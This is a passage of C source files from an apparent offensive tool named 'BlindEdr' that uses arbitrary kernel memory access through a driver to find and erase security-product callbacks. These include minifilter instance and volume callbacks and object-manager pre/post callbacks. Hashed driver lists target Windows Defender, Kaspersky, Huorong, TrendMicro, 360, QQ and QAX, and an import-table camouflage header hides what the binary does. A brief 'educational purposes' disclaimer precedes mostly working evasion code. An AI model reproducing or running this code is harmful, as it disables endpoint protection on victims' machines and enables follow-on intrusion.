GetStdHandle(STD_OUTPUT_HANDLE); 9 | CONSOLE_CURSOR_INFO cursorInfo; 10 | GetConsoleCursorInfo(hConsole, &cursorInfo); 11 | BOOL originalCursorVisible = cursorInfo.bVisible; 12 | 13 | // Hide cursor for smooth refresh 14 | cursorInfo.bVisible = FALSE; 15 | SetConsoleCursorInfo(hConsole, &cursorInfo); 16 | 17 | printf("\n" ); 18 | printf("===========================================================================\n" ); 19 | printf(" LEGAL DISCLAIMER \n"); 20 | printf("===========================================================================\n" ); 21 | printf("\n" ); 22 | printf("This software is provided 'as-is' without any express or implied warranty.\n" ); 23 | printf("In no event will the authors be held liable for any damages arising from\n" ); 24 | printf("the use of this software. This is for educational purposes only.\n" ); 25 | printf("\n" ); 26 | printf("By using this software you agree that:\n" ); 27 | printf("1. You will only use it on systems you own or have permission to test.\n" ); 28 | printf("2. You accept all responsibility for any consequences that arise from use.\n" ); 29 | printf("3. You will not use this software for any malicious purposes.\n" ); 30 | printf("4. You understand this tool may cause system instability.\n" ); 31 | printf("\n" ); 32 | printf("===========================================================================\n" ); 33 | printf("\n" ); 34 | 35 | // Get current cursor position for countdown 36 | COORD cursorPos; 37 | CONSOLE_SCREEN_BUFFER_INFO csbi; 38 | if (GetConsoleScreenBufferInfo(hConsole, &csbi)) { 39 | cursorPos.X = 0; 40 | cursorPos.Y = csbi.dwCursorPosition.Y; 41 | } else { 42 | // Fallback if we can't get the cursor position 43 | cursorPos.X = 0; 44 | cursorPos.Y = 20; // Reasonable default value 45 | } 46 | 47 | // Countdown loop with dynamic refresh 48 | for (int i = 5; i > 0; i--) { 49 | SetConsoleCursorPosition(hConsole, cursorPos); 50 | printf("Please wait %d seconds before accepting...", i); 51 | Sleep(1000); 52 | } 53 | 54 | // Clear countdown line and show prompt 55 | SetConsoleCursorPosition(hConsole, cursorPos); 56 | printf(" \r"); 57 | printf("Do you accept these terms? (y/n): "); 58 | 59 | // Restore original cursor visibility 60 | cursorInfo.bVisible = originalCursorVisible; 61 | SetConsoleCursorInfo(hConsole, &cursorInfo); 62 | 63 | // Flush any input during countdown 64 | FlushConsoleInputBuffer(GetStdHandle(STD_INPUT_HANDLE)); 65 | 66 | // Get user response 67 | char response; 68 | response = getchar(); 69 | while (getchar() != '\n'); // Clear input buffer 70 | 71 | return (response == 'y' || response == 'Y'); 72 | } -------------------------------------------------------------------------------- /BlindEdr/DriverNameUtils.c: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "Structs.h" 3 | 4 | #include 5 | 6 | #define UINT64_MAX 0xffffffffffffffffui64 7 | 8 | static PUINT64 addressArray = NULL; 9 | static UINT64 ArraySize = 0; 10 | static UINT64 ArraySizeByte = 0; 11 | 12 | CHAR* ReadDriverName(INT64 FLT_FILTERAddr) { 13 | // Early parameter validation 14 | if (!FLT_FILTERAddr) { 15 | return NULL; 16 | } 17 | 18 | INT Offset = 0; 19 | INT64 FilterNameAddr = 0; 20 | USHORT FilterNameLen = 0; 21 | TCHAR* FilterName = NULL; 22 | CHAR* FilterNameA = NULL; 23 | DWORD dwMajor = GetNtVersion(); 24 | DWORD build = GetNtBuild(); 25 | 26 | // Determine offset based on Windows version 27 | switch (dwMajor) { 28 | case 10: 29 | Offset = (build == 26100) ? 0x40 : 0x38; 30 | break; 31 | case 6: 32 | Offset = 0x28; 33 | break; 34 | default: 35 | PRINT("[ReadDriverName] Unsupported Windows version.\n"); 36 | return NULL; // Replace exit() with return for better error handling 37 | } 38 | 39 | // Read filter name length 40 | DriverMemoryOperation((VOID*)(FLT_FILTERAddr + Offset + 2), &FilterNameLen, 2, MEMORY_WRITE); 41 | if (FilterNameLen == 0) { 42 | return NULL; 43 | } 44 | 45 | // Read filter name address 46 | DriverMemoryOperation((VOID*)(FLT_FILTERAddr + Offset + 8), &FilterNameAddr, 8, MEMORY_WRITE); 47 | if (!FilterNameAddr) { 48 | return NULL; 49 | } 50 | 51 | // Allocate buffer for filter name with bounds checking 52 | if (FilterNameLen > MAX_PATH) { // Add reasonable size limit 53 | return NULL; 54 | } 55 | 56 | FilterName = (TCHAR*)calloc(FilterNameLen + 1, sizeof(TCHAR)); // More precise allocation 57 | if (!FilterName) { 58 | return NULL; 59 | } 60 | 61 | // Read filter name 62 | DriverMemoryOperation((VOID*)FilterNameAddr, FilterName, FilterNameLen, MEMORY_WRITE); 63 | 64 | // Convert to ANSI string 65 | FilterNameA = (CHAR*)calloc(FilterNameLen + 5, sizeof(CHAR)); // +5 for ".sys\0" 66 | if (!FilterNameA) { 67 | free(FilterName); 68 | return NULL; 69 | } 70 | 71 | size_t convertedChars = 0; 72 | errno_t err = wcstombs_s(&convertedChars, 73 | FilterNameA, 74 | FilterNameLen + 1, 75 | FilterName, 76 | FilterNameLen); 77 | 78 | if (err != 0) { 79 | free(FilterName); 80 | free(FilterNameA); 81 | return NULL; 82 | } 83 | 84 | free(FilterName); // Free temporary wide string buffer 85 | lstrcatA(FilterNameA, ".sys"); 86 | return FilterNameA; 87 | } 88 | 89 | CHAR* GetDriverName(UINT64 DriverCallBackFuncAddr) 90 | { 91 | CHAR* DriverName = NULL; 92 | DWORD bytesNeeded = 0; 93 | DWORD i = 0; 94 | INT j = 0; 95 | INT64 tmp = 0; 96 | PUINT64 ArrayMatch = NULL; 97 | UINT64 MatchAddr = 0; 98 | 99 | // Init driver address array if needed 100 | if (!addressArray) { 101 | if (EnumDeviceDrivers(NULL, 0, &bytesNeeded)) { 102 | ArraySize = bytesNeeded / 8; 103 | ArraySizeByte = bytesNeeded; 104 | addressArray = (INT64*)malloc(ArraySizeByte); 105 | if (addressArray == NULL) return NULL; 106 | EnumDeviceDrivers((LPVOID*)addressArray, ArraySizeByte, &bytesNeeded); 107 | } 108 | } 109 | 110 | if (addressArray) { 111 | // Use stack memory instead of heap to avoid memory leaks 112 | UINT64 stackArrayMatch[1024]; // Assuming driver count won't exceed 1024 113 | 114 | // Optimize search logic - find closest address in a single pass 115 | UINT64 closestAddr = 0; 116 | UINT64 minDiff = UINT64_MAX; 117 | 118 | for (i = 0; i < ArraySize - 1; i++) { 119 | if (DriverCallBackFuncAddr > addressArray[i]) { 120 | UINT64 diff = DriverCallBackFuncAddr - addressArray[i]; 121 | if (diff < minDiff) { 122 | minDiff = diff; 123 | closestAddr = addressArray[i]; 124 | } 125 | } 126 | } 127 | 128 | // If a matching address was found 129 | if (closestAddr != 0) { 130 | CHAR* DriverName = (CHAR*)calloc(1024, 1); 131 | if (DriverName && GetDeviceDriverBaseNameA((LPVOID)closestAddr, DriverName, 1024) > 0) { 132 | return DriverName; 133 | } 134 | free(DriverName); 135 | } 136 | } 137 | return NULL; 138 | } 139 | -------------------------------------------------------------------------------- /BlindEdr/EDRDetector.c: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "Structs.h" 3 | 4 | #include 5 | 6 | static INT64 EDRIntance[500] = { 0 }; 7 | 8 | 9 | static CONST CHAR* subKESDriver[] = { 10 | "KES-21-19", 11 | "KES-21-18", 12 | 13 | NULL 14 | }; 15 | 16 | static const UINT32 AVDriverHashes[] = { 17 | // WindowsDefender 18 | 0x7E4D2512,0x1A330284,0xDED88530,0xA2A98222,0x7D911820, 19 | 20 | // KES 21 | 0x3E12B6FE,0x571CA6FF,0x3CC480EF,0x54937AD7,0xF7BE44F8,0x7E235EA1,0x86874B8B,0xD359413E,0xA9819418,0xF1F36EBF,0x01ED40A3,0x4619C487, 22 | 0xA8E77CD2,0x82C5F13E,0x610A107F,0xF55A2F67,0x073F04BF,0xEEA2357F,0xEDB8DA78,0xE14D1AC8,0x8B05A2F1,0x62D34354,0x53B293AF,0x0B8D3901, 23 | 0x3FE6C283,0xCF500A97,0x502EDE53,0x168A52E7,0x396821BB,0x13F4A216,0xD12FDB61,0x7960C13B,0xD27C5841,0xC17181CA,0x63DB05B8,0xBCC3FAA4, 24 | 0x32834046,0x65B1ACC7,0x9BA48E39,0xA4CE5A08,0x845BEEA8,0x98487B2C,0x24EC600E,0x1E6EE6AF,0x073F04BF,0xBD113F5B,0x837593DF,0x030A0D8A, 25 | 0x99396BEC,0x9D7C7F3E,0xD83021DF,0x7DFB6117,0xBF5DDE48,0x45D6DBCF,0x3CE21B9B,0x923563E9,0x9FFD0E46,0x0E562194, 26 | 27 | // Huorong 28 | 0xB1FC83F6,0x4E477102,0x45B3019A,0x74D4FE38, 29 | 30 | // TrendMicro 31 | 0x45B3019A,0x74D4FE38, 32 | 33 | // Fucking360 34 | 0x1769D599,0xE0CB15E9,0x97450F17,0xA23F8699,0x8E10C152,0xFE7A205E,0xAFFFFF43,0x9099945E,0xA4778C2F,0x8A336A20,0xE0CB15E9,0x773C859D, 35 | 0xAA4E092B,0x13DAC3F0,0x9237715B,0xD7E260AA, 36 | 37 | // QQ 38 | 0x7087ED00,0x4DE04A6C,0xD8BCF2E8,0x4614A037,0xF58868D5,0xF6D9E3E2,0x32B80ABF, 39 | 40 | // QAX 41 | 0xC3C27A06,0x1A35000E,0xEA5FD256,0xB631AED2,0x365F51E1,0x229DC07D,0xF79B4B0C, 42 | 43 | NULL 44 | }; 45 | 46 | VOID AddEDRIntance(INT64 InstanceAddr) { 47 | INT i = 0; 48 | while (EDRIntance[i] != 0) { 49 | i++; 50 | } 51 | EDRIntance[i] = InstanceAddr; 52 | } 53 | 54 | BOOL IsEDRIntance(INT j, INT64 Flink) { 55 | Flink += 0x10; 56 | INT k = 0; 57 | BOOL Flag = 0; 58 | INT64 FilterAddr = 0; 59 | INT64 InstanceAddr = 0; 60 | DWORD dwMajor = GetNtVersion(); 61 | DWORD dwbuild = GetNtBuild(); 62 | // Read instance address 63 | DriverMemoryOperation((VOID*)Flink, &InstanceAddr, 8, MEMORY_WRITE); 64 | 65 | // Check if instance is in EDR list 66 | while (EDRIntance[k] != 0) { 67 | if (EDRIntance[k] == InstanceAddr) { 68 | Flag = 1; 69 | } 70 | k++; 71 | } 72 | if (!Flag) { 73 | return Flag; 74 | } 75 | 76 | // Adjust offset based on Windows version 77 | if (dwMajor == 10 && dwbuild == 26100) { 78 | InstanceAddr += 0x48; 79 | } 80 | else if (dwMajor == 10) { 81 | InstanceAddr += 0x40; 82 | } 83 | else if (dwMajor == 6) { 84 | InstanceAddr += 0x30; 85 | } 86 | else { 87 | PRINT("[IsEDRIntance] Unsupported Windows version.\n"); 88 | exit(0); 89 | } 90 | 91 | // Read filter address 92 | DriverMemoryOperation((VOID*)InstanceAddr, &FilterAddr, 8, MEMORY_WRITE); 93 | CHAR* FilterName = ReadDriverName(FilterAddr); 94 | if (FilterName == NULL) { 95 | 96 | return 0; 97 | } 98 | PRINT("\t\t[%d] %s : %I64x [Clear]\n", j, FilterName, Flink - 0x10); 99 | 100 | return Flag; 101 | } 102 | 103 | BOOL IsEDRHash(const PCHAR DriverName) { 104 | // Input validation 105 | if (!DriverName) { 106 | return FALSE; 107 | } 108 | 109 | // Pre-calculate hash to avoid multiple computations 110 | const UINT32 driverHash = CHASH(DriverName); 111 | 112 | // Ensure arrays are not empty at compile time 113 | static_assert(sizeof(AVDriverHashes) > 0, "AVDriverHashes array is empty"); 114 | static_assert(sizeof(subKESDriver) > 0, "PrefixAVDriver array is empty"); 115 | 116 | // Check for hash matches in known EDR drivers 117 | for (size_t i = 0; AVDriverHashes[i] != NULL; i++) { 118 | if (driverHash == AVDriverHashes[i]) { 119 | return TRUE; 120 | } 121 | } 122 | 123 | // Check for sub string matches in known EDR drivers 124 | for (size_t i = 0; subKESDriver[i] != NULL; i++) { 125 | if (ci_strstr(DriverName, subKESDriver[i])) { 126 | return TRUE; 127 | } 128 | } 129 | 130 | return FALSE; 131 | } 132 | -------------------------------------------------------------------------------- /BlindEdr/FilterCallbackManager.c: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "Structs.h" 3 | 4 | #include "RemoveCallBacks.h" 5 | 6 | #include "stdio.h" 7 | 8 | #define MAX_CALLBACK_NODES 50 9 | #define CALLBACK_NODE_SIZE 8 10 | 11 | static inline SIZE_T GetInstanceOffset(DWORD major, DWORD build) { 12 | 13 | return 14 | (major == 10 && build == 26100) ? 0xD8 : // 0x70 + 0x68 15 | (major == 10) ? 0xD0 : // 0x68 + 0x68 16 | (major == 6) ? 0xC0 : // 0x58 + 0x68 17 | 0; 18 | } 19 | 20 | static inline SIZE_T GetInstanceListOffset(DWORD major, DWORD build) { 21 | return 22 | (major == 10 && build == 26100) ? 0x78 : 23 | (major == 10) ? 0x70 : 24 | (major == 6) ? 0x60 : 25 | 0; 26 | } 27 | 28 | static inline SIZE_T GetCallbackNodeOffset(DWORD major, DWORD build) { // rename callbacknode 29 | return 30 | (major == 10 && build == 26100) ? 0x130 : // Windows11 24H2 31 | (major == 10 && build < 22000) ? 0xa0 : 32 | (major == 10 && build >= 22000) ? 0xa8 : 33 | (major == 6) ? 0x90 : 0; 34 | } 35 | 36 | static inline SIZE_T GetFilterCallbackOffset(DWORD major, DWORD build) { 37 | return 38 | (major == 10 && build == 26100) ? 0x140 : 39 | (major == 10) ? (build >= 22621 ? 0x130 : 0x120) : 40 | (major == 6) ? 0x110 : 41 | 0; 42 | } 43 | 44 | VOID RemoveInstanceCallback(INT64 FLT_FILTERAddr) { 45 | INT64 FilterInstanceAddr = 0; 46 | 47 | DWORD dwMajor = GetNtVersion(); 48 | DWORD dwBuild = GetNtBuild(); 49 | 50 | SIZE_T instanceListOffset = GetInstanceListOffset(dwMajor, dwBuild); 51 | SIZE_T instanceOffset = GetInstanceOffset(dwMajor, dwBuild); 52 | SIZE_T CallbackNodeOffset = GetCallbackNodeOffset(dwMajor, dwBuild); 53 | 54 | if (!instanceListOffset || !instanceOffset || !CallbackNodeOffset) { 55 | PRINT("[RemoveInstanceCallback] Error: Windows version %d is not supported\n", dwMajor); 56 | return; 57 | } 58 | 59 | DriverMemoryOperation((VOID*)(FLT_FILTERAddr + instanceOffset), 60 | &FilterInstanceAddr, 61 | 8, 62 | MEMORY_WRITE); 63 | 64 | // Count instances in list 65 | INT64 FirstLink = FilterInstanceAddr; 66 | INT64 data = 0; 67 | INT count = 0; 68 | 69 | do { 70 | count++; 71 | INT64 tmpAddr = 0; 72 | DriverMemoryOperation((VOID*)(FilterInstanceAddr), &tmpAddr, 8, MEMORY_WRITE); 73 | FilterInstanceAddr = tmpAddr; 74 | } while (FirstLink != FilterInstanceAddr); 75 | count--; 76 | 77 | // Process each instance 78 | INT i = 0; 79 | do { 80 | FilterInstanceAddr -= instanceListOffset; 81 | PRINT("\t\t(i)FLT_INSTANCE 0x%I64x\n", FilterInstanceAddr); 82 | AddEDRIntance(FilterInstanceAddr); 83 | 84 | // Clear callback nodes 85 | for (INT nodeIndex = 0; nodeIndex < MAX_CALLBACK_NODES; nodeIndex++) { 86 | INT64 CallbackNodeData = 0; 87 | 88 | DriverMemoryOperation((VOID*)(FilterInstanceAddr + CallbackNodeOffset + nodeIndex * 8), 89 | &CallbackNodeData, 8, MEMORY_WRITE); 90 | 91 | if (CallbackNodeData != 0) { 92 | PRINT("\t\t\t[%d] : 0x%I64x\t[Clear]\n", nodeIndex, CallbackNodeData); 93 | DriverMemoryOperation(&data, (VOID*)(FilterInstanceAddr + CallbackNodeOffset + nodeIndex * 8), 94 | 8, MEMORY_WRITE); 95 | } 96 | } 97 | 98 | // Move to next instance 99 | INT64 tmpAddr = 0; 100 | DriverMemoryOperation((VOID*)(FilterInstanceAddr + instanceListOffset), &tmpAddr, 8, MEMORY_WRITE); 101 | FilterInstanceAddr = tmpAddr; 102 | i++; 103 | } while (i < count); 104 | } 105 | 106 | VOID ClearMiniFilterCallBack(INT64 FltEnumerateFiltersAddr) { 107 | 108 | DWORD dwMajor = GetNtVersion(); 109 | DWORD dwBuild = GetNtBuild(); 110 | 111 | INT64 FrameAddrPTR = 0; 112 | INT64 FLT_FRAMEAddr = 0; 113 | UINT64 offset = 0; 114 | UINT64 FltGlobalsAddr = 0; 115 | 116 | INT64 FLT_FILTERAddr = 0; 117 | ULONG FilterCount = 0; 118 | INT64 FLT_VOLUMESAddr = 0; 119 | ULONG FLT_VOLUMESCount = 0; 120 | 121 | INT64 FilterCallbackOffset = GetFilterCallbackOffset(dwMajor, dwBuild); 122 | 123 | PRINT("\n\n----------------------------------------------------\n"); 124 | PRINT("Register MiniFilter Callback driver:"); 125 | PRINT("\n\n----------------------------------------------------\n"); 126 | 127 | // Validate function address 128 | if (!FltEnumerateFiltersAddr) { 129 | PRINT("FltEnumerateFilters function address not found.\n"); 130 | return; 131 | } 132 | 133 | FltGlobalsAddr = FindPattern(FltEnumerateFiltersAddr, &PREDEFINED_PATTERNS[3], 300); 134 | offset = CalculateOffset(FltGlobalsAddr, 2, 6); 135 | 136 | // Get Frame address pointer 137 | FrameAddrPTR = FltGlobalsAddr + 7 + offset; 138 | 139 | // Get FLT_FRAME address 140 | DriverMemoryOperation((VOID*)FrameAddrPTR, &FLT_FRAMEAddr, 8, MEMORY_WRITE); 141 | FLT_FRAMEAddr -= 0x8; 142 | PRINT("FLT_FRAME: 0x%I64x\n", FLT_FRAMEAddr); 143 | 144 | // Get FLT_FILTER address 145 | DriverMemoryOperation((VOID*)(FLT_FRAMEAddr + 0xB0), &FLT_FILTERAddr, 8, MEMORY_WRITE); 146 | INT64 FilterFirstLink = FLT_FILTERAddr; 147 | 148 | // Get filter count 149 | DriverMemoryOperation((VOID*)(FLT_FRAMEAddr + 0xC0), &FilterCount, 4, MEMORY_WRITE); 150 | 151 | INT i = 0; 152 | do { 153 | FLT_FILTERAddr -= 0x10; 154 | CHAR* FilterName = ReadDriverName(FLT_FILTERAddr); 155 | if (FilterName == NULL) break; 156 | PRINT("\tFLT_FILTER %s: 0x%I64x\n", FilterName, FLT_FILTERAddr); 157 | 158 | if (IsEDRHash(FilterName)) { 159 | RemoveInstanceCallback(FLT_FILTERAddr); 160 | } 161 | 162 | // Move to next filter 163 | INT64 tmpaddr = 0; 164 | DriverMemoryOperation((VOID*)(FLT_FILTERAddr + 0x10), &tmpaddr, 8, MEMORY_WRITE); 165 | FLT_FILTERAddr = tmpaddr; 166 | i++; 167 | } while (i < FilterCount); 168 | 169 | // Get FLT_VOLUMES address 170 | // 0x130 = 0xc8 + 0x68 171 | DriverMemoryOperation((VOID*)(FLT_FRAMEAddr + 0x130), &FLT_VOLUMESAddr, 8, MEMORY_WRITE); 172 | 173 | // Get volumes count 174 | DriverMemoryOperation((VOID*)(FLT_FRAMEAddr + 0x140), &FLT_VOLUMESCount, 4, MEMORY_WRITE); 175 | 176 | PRINT("\tFLT_VOLUMESCount: %d\n", FLT_VOLUMESCount); 177 | 178 | // should be modified!! 179 | // 1/17/2025 180 | i = 0; 181 | do { 182 | FLT_VOLUMESAddr -= 0x10; 183 | PRINT("\tFLT_VOLUMES [%d]: %I64x\n", i, FLT_VOLUMESAddr); 184 | 185 | // Get callback offset based on OS version 186 | 187 | if (!FilterCallbackOffset) { 188 | PRINT("[FilterCallbackOffset] Windows system version not supported yet.\n"); 189 | return; 190 | } 191 | 192 | INT64 VolumesCallback = FLT_VOLUMESAddr + FilterCallbackOffset; 193 | // Process callback nodes 194 | for (INT callbackIndex = 0; callbackIndex < MAX_CALLBACK_NODES; callbackIndex++) { 195 | 196 | INT64 FlinkAddr = VolumesCallback + (callbackIndex * 16); 197 | INT64 Flink = 0; 198 | 199 | INT nodeCount = 0; 200 | INT nodeIndex = 0; 201 | 202 | DriverMemoryOperation((VOID*)FlinkAddr, &Flink, 8, MEMORY_WRITE); 203 | INT64 Blink = 0; 204 | DriverMemoryOperation((VOID*)(FlinkAddr + 8), &Blink, 8, MEMORY_WRITE); 205 | 206 | INT64 First = Flink; 207 | // Count nodes in the list 208 | do { 209 | nodeCount++; 210 | INT64 NextFlink = 0; 211 | DriverMemoryOperation((VOID*)First, &NextFlink, 8, MEMORY_WRITE); 212 | First = NextFlink; 213 | } while (FlinkAddr != First); 214 | 215 | // Process each node in the list 216 | INT64 CurLocate = Flink; 217 | do { 218 | INT64 NextFlink = 0; 219 | DriverMemoryOperation((VOID*)CurLocate, &NextFlink, 8, MEMORY_WRITE); 220 | if (IsEDRIntance(callbackIndex, CurLocate)) { 221 | INT64 tmpNextFlink = 0; 222 | DriverMemoryOperation((VOID*)CurLocate, &tmpNextFlink, 8, MEMORY_WRITE); 223 | DriverMemoryOperation(&tmpNextFlink, (VOID*)FlinkAddr, 8, MEMORY_WRITE); 224 | DriverMemoryOperation(&tmpNextFlink, (VOID*)(FlinkAddr + 8), 8, MEMORY_WRITE); 225 | } 226 | else { 227 | FlinkAddr = CurLocate; 228 | } 229 | 230 | CurLocate = NextFlink; 231 | nodeIndex++; 232 | } while (nodeIndex < nodeCount); 233 | } 234 | 235 | // Move to next volume 236 | INT64 tmpaddr = 0; 237 | DriverMemoryOperation((VOID*)(FLT_VOLUMESAddr + 0x10), &tmpaddr, 8, MEMORY_WRITE); 238 | FLT_VOLUMESAddr = tmpaddr; 239 | i++; 240 | } while (i < FLT_VOLUMESCount); 241 | } -------------------------------------------------------------------------------- /BlindEdr/FunctionPointers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | 6 | typedef HMODULE(WINAPI* fnLoadLibraryExA)( 7 | IN LPCSTR lpLibFileName, 8 | IN HANDLE hFile, 9 | IN DWORD dwFlags 10 | ); 11 | 12 | typedef HMODULE(WINAPI* fnLoadLibraryA)(IN LPCSTR lpLibFileName); 13 | 14 | typedef BOOL(WINAPI* fnOpenProcessToken)( 15 | HANDLE ProcessHandle, // Handle to the process 16 | DWORD DesiredAccess, // Desired access to the token 17 | PHANDLE TokenHandle // Pointer to receive token handle 18 | ); 19 | 20 | typedef BOOL(WINAPI* fnLookupPrivilegeValueA)( 21 | LPCSTR lpSystemName, // Name of system (NULL for local) 22 | LPCSTR lpName, // Name of privilege 23 | PLUID lpLuid // Receives LUID of privilege 24 | ); 25 | 26 | typedef BOOL(WINAPI* fnAdjustTokenPrivileges)( 27 | HANDLE TokenHandle, // Handle to token 28 | BOOL DisableAllPrivileges, // TRUE to disable all privileges 29 | PTOKEN_PRIVILEGES NewState, // Array of privileges 30 | DWORD BufferLength, // Size of buffer 31 | PTOKEN_PRIVILEGES PreviousState, // Previous state (NULL if not needed) 32 | PDWORD ReturnLength // Required buffer size 33 | ); -------------------------------------------------------------------------------- /BlindEdr/IatCamo.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | // Compile-time constants for randomization 6 | #define SEED_PRIME_1 0x1337CAFE 7 | #define SEED_PRIME_2 0xAE860167 8 | #define SEED_PRIME_3 0xB16B00B5 9 | 10 | // Generate compile-time seed using time 11 | #define TIME_SEED (__TIME__[7] - '0' + \ 12 | (__TIME__[6] - '0') * 10 + \ 13 | (__TIME__[4] - '0') * 60 + \ 14 | (__TIME__[3] - '0') * 600 + \ 15 | (__TIME__[1] - '0') * 3600 + \ 16 | (__TIME__[0] - '0') * 36000) 17 | 18 | // Compile-time hash calculation 19 | #define COMPILE_TIME_HASH(x) ((x) * SEED_PRIME_1 ^ \ 20 | ((x) << 13) * SEED_PRIME_2 ^ \ 21 | ((x) >> 7) * SEED_PRIME_3) 22 | 23 | // Helper function for memory operations 24 | __forceinline PVOID AllocateRandomBuffer(PVOID* ppAddress) { 25 | SIZE_T size = (TIME_SEED & 0xFFF) + 0x100; 26 | PVOID pAddress = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size); 27 | if (!pAddress) return NULL; 28 | 29 | *(DWORD*)pAddress = COMPILE_TIME_HASH(TIME_SEED); 30 | *ppAddress = pAddress; 31 | return pAddress; 32 | } 33 | 34 | // Main camouflage function 35 | __declspec(noinline) VOID IatCamouflage(VOID) { 36 | PVOID pAddress = NULL; 37 | volatile int* pValue = (int*)AllocateRandomBuffer(&pAddress); 38 | if (!pValue) return; 39 | 40 | // Use RDTSC for unpredictable execution path 41 | if (__rdtsc() % COMPILE_TIME_HASH(TIME_SEED) == *pValue) { 42 | volatile UINT64 result = 0; 43 | 44 | // Mix Windows API calls 45 | result += GetTickCount64(); 46 | result += GetCurrentProcessId(); 47 | result ^= GetLastError(); 48 | result += IsDebuggerPresent(); 49 | 50 | // System information calls 51 | SYSTEM_INFO sysInfo = {0}; 52 | GetSystemInfo(&sysInfo); 53 | result ^= sysInfo.dwPageSize; 54 | 55 | // Time-based operations 56 | FILETIME ft = {0}; 57 | GetSystemTimeAsFileTime(&ft); 58 | result += ft.dwLowDateTime; 59 | 60 | // Additional entropy 61 | result *= GetCurrentThreadId(); 62 | result ^= __rdtsc(); 63 | 64 | *(volatile UINT64*)pAddress = result; 65 | } 66 | 67 | HeapFree(GetProcessHeap(), 0, pAddress); 68 | } -------------------------------------------------------------------------------- /BlindEdr/ObjectCallbackManager.c: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "Structs.h" 3 | 4 | #include "RemoveCallBacks.h" 5 | 6 | #include "stdio.h" 7 | 8 | #define OB_CALLBACK_PRE_OPERATION_OFFSET 0x28 // 40 9 | #define OB_CALLBACK_POST_OPERATION_OFFSET 0x30 // 48 10 | 11 | 12 | 13 | 14 | static inline SIZE_T GetObCallbackListOffset(DWORD major, DWORD minor) { 15 | if (major >= 10) return 0xC8; // Windows 10 and above 16 | if (major == 6 && minor == 3) return 0xC8; // Windows 8.1 17 | if (major == 6) return 0xC0; // Windows 7/8 18 | return 0; // Unsupported version 19 | } 20 | 21 | void ProcessCallback(INT64 Flink, INT64 operationAddr, SIZE_T offset, 22 | PS_OBJECT_TYPE objectType, const CHAR* opType, BYTE* data) { 23 | CHAR* driverName = GetDriverName(operationAddr); 24 | if (driverName != NULL) { 25 | if (IsEDRHash(driverName)) { 26 | DriverMemoryOperation(data, (VOID*)(Flink + offset), 8, MEMORY_WRITE); 27 | PRINT("%s %s: %s [Clear]\n", 28 | objectType == PsProcessType ? "Process" : "Thread", 29 | opType, 30 | driverName); 31 | } 32 | else { 33 | PRINT("%s %s: %s\n", 34 | objectType == PsProcessType ? "Process" : "Thread", 35 | opType, 36 | driverName); 37 | } 38 | } 39 | } 40 | 41 | INT64 GetPsProcessAndProcessTypeAddr(PS_OBJECT_TYPE objectType) { 42 | INT64 FuncAddress = 0; 43 | UINT64 patternAddr = 0; 44 | UINT64 offset = 0; 45 | // Select target function based on objecttype 46 | switch (objectType) { 47 | case PsProcessType: 48 | FuncAddress = GetFuncAddressH(NTOSKRNLEXE_CH, NtDuplicateObject_CH); 49 | break; 50 | 51 | case PsThreadType: 52 | FuncAddress = GetFuncAddressH(NTOSKRNLEXE_CH, NtOpenThreadTokenEx_CH); 53 | break; 54 | 55 | default: 56 | PRINT("Invalid object type\n"); 57 | return 0; 58 | } 59 | 60 | 61 | patternAddr = FindPattern(FuncAddress, &PREDEFINED_PATTERNS[4], 300); 62 | 63 | offset = CalculateOffset(patternAddr, 2, 6); 64 | 65 | // Calculate target VA 66 | INT64 PsProcessTypePtr = patternAddr + 7 + offset; 67 | 68 | // Read target address 69 | INT64 PsProcessTypeAddr = 0; 70 | DriverMemoryOperation((VOID*)PsProcessTypePtr, &PsProcessTypeAddr, 8, MEMORY_WRITE); 71 | return PsProcessTypeAddr; 72 | } 73 | 74 | 75 | 76 | VOID RemoveObRegisterCallbacks(INT64 PsProcessTypeAddr, PS_OBJECT_TYPE objectType) { 77 | 78 | BYTE* data = (BYTE*)calloc(8, 1); 79 | if (data == NULL) return; 80 | 81 | DWORD dwMajor = GetNtVersion(); 82 | DWORD dwMinorVersion = GetNtMinorVersion; 83 | INT64 CallbackListAddr = 0; 84 | INT64 offset = 0; 85 | 86 | // Get callback list offset based on OS version 87 | 88 | offset = GetObCallbackListOffset(dwMajor, dwMinorVersion); 89 | 90 | if (!PsProcessType || !offset) { 91 | PRINT("Unsupported OS version\n"); 92 | return; 93 | } 94 | 95 | CallbackListAddr = PsProcessTypeAddr + offset; 96 | 97 | // Read list head pointers 98 | INT64 Flink = 0; 99 | DriverMemoryOperation((VOID*)CallbackListAddr, &Flink, 8, MEMORY_WRITE); 100 | INT64 Blink = 0; 101 | DriverMemoryOperation((VOID*)(CallbackListAddr + 8), &Blink, 8, MEMORY_WRITE); 102 | 103 | // Count callback nodes 104 | INT Count = 1; 105 | INT64 tFlink = Flink; 106 | do { 107 | Count++; 108 | INT64 temp = 0; 109 | DriverMemoryOperation((VOID*)(tFlink), &temp, 8, MEMORY_WRITE); 110 | tFlink = temp; 111 | } while (tFlink != Blink); 112 | 113 | // Process callback nodes 114 | 115 | 116 | for (INT i = 0; i < Count; i++) { 117 | // Read callback functions 118 | INT64 EDRPreOperation = 0; 119 | INT64 EDRPostOperation = 0; 120 | 121 | DriverMemoryOperation((VOID*)(Flink + OB_CALLBACK_PRE_OPERATION_OFFSET), &EDRPreOperation, 8, MEMORY_WRITE); 122 | DriverMemoryOperation((VOID*)(Flink + OB_CALLBACK_POST_OPERATION_OFFSET), &EDRPostOperation, 8, MEMORY_WRITE); 123 | 124 | 125 | ProcessCallback(Flink, EDRPreOperation, OB_CALLBACK_PRE_OPERATION_OFFSET, 126 | objectType, "PreOperation", data); 127 | ProcessCallback(Flink, EDRPostOperation, OB_CALLBACK_POST_OPERATION_OFFSET, 128 | objectType, "PostOperation", data); 129 | 130 | // Move to next node 131 | INT64 temp = 0; 132 | DriverMemoryOperation((VOID*)(Flink), &temp, 8, MEMORY_WRITE); 133 | Flink = temp; 134 | } 135 | 136 | free(data); 137 | } 138 | 139 | VOID ClearObRegisterCallbacks() { 140 | const struct { 141 | PS_OBJECT_TYPE type; 142 | const CHAR* name; 143 | } objects[] = { 144 | { PsProcessType, "process" }, 145 | { PsThreadType, "thread" } 146 | }; 147 | 148 | 